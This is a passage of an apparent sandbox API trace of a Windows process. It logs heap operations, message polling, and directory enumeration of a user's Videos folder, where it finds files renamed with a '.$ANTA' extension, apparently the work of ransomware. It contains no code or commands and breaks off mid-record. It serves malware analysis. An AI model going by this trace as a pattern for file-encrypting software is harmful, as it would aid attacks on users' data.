[0109.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0109.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0109.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0109.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0109.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0109.418] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0109.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0109.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0109.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0109.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0109.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0109.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0109.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0109.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0109.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0109.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0109.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0109.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0109.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0109.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0109.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0109.419] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0109.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0109.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0109.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0109.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0109.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0109.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0109.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0109.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0109.420] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\*", lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c1344d0, ftCreationTime.dwHighDateTime=0x1d5e0cc, ftLastAccessTime.dwLowDateTime=0xd5933aa, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xd5933aa, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca4d8, cFileName=".", cAlternateFileName="")) returned 0x41ac700 [0109.420] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c1344d0, ftCreationTime.dwHighDateTime=0x1d5e0cc, ftLastAccessTime.dwLowDateTime=0xd5933aa, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xd5933aa, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca4d8, cFileName="..", cAlternateFileName="")) returned 1 [0109.420] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6865d1, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xc6865d1, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xc9cd968, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x103b0, dwReserved0=0x0, dwReserved1=0x43ca4d8, cFileName="Cu3r8FST64g6XD.flv.$ANTA", cAlternateFileName="CU3R8F~1.$AN")) returned 1 [0109.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0109.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0109.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0109.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0109.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0109.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0109.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0109.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0109.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0109.421] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0109.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0109.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0109.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0109.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.421] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0109.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0109.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0109.422] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0109.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0109.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0109.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0109.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0109.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0109.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0109.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0109.422] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0109.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0109.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0109.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0109.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.422] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0109.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0109.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0109.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0109.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0109.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0109.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0109.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0109.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0109.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0109.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0109.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0109.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0109.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0109.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0109.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0109.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0109.423] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0109.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0109.423] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0109.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0109.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0109.424] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb24f72, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xcb24f72, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xcbe3b1e, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x135f0, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="DU9VQvjn.swf.$ANTA", cAlternateFileName="DU9VQV~1.$AN")) returned 1 [0109.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0109.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0109.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0109.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0109.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0109.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0109.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0109.424] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0109.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0109.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0109.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0109.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.424] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0109.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0109.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0109.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0109.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0109.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0109.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0109.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0109.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0109.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0109.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0109.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0109.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0109.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0109.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0109.425] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0109.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0109.425] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0109.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0109.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0109.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.426] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd035d75, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0xd035d75, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0xd520c99, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x10510, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="recAT1.mkv.$ANTA", cAlternateFileName="RECAT1~1.$AN")) returned 1 [0109.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0109.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0109.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0109.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0109.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0109.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0109.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.426] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0109.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0109.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0109.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0109.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.426] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0109.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0109.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0109.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0109.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0109.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0109.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0109.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0109.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0109.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0109.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0109.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0109.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0109.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0109.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0109.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0109.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0109.427] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0109.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0109.427] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0109.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0109.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0109.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0109.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0109.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0109.428] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e27f0, ftCreationTime.dwHighDateTime=0x144e8e8, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e27f0, 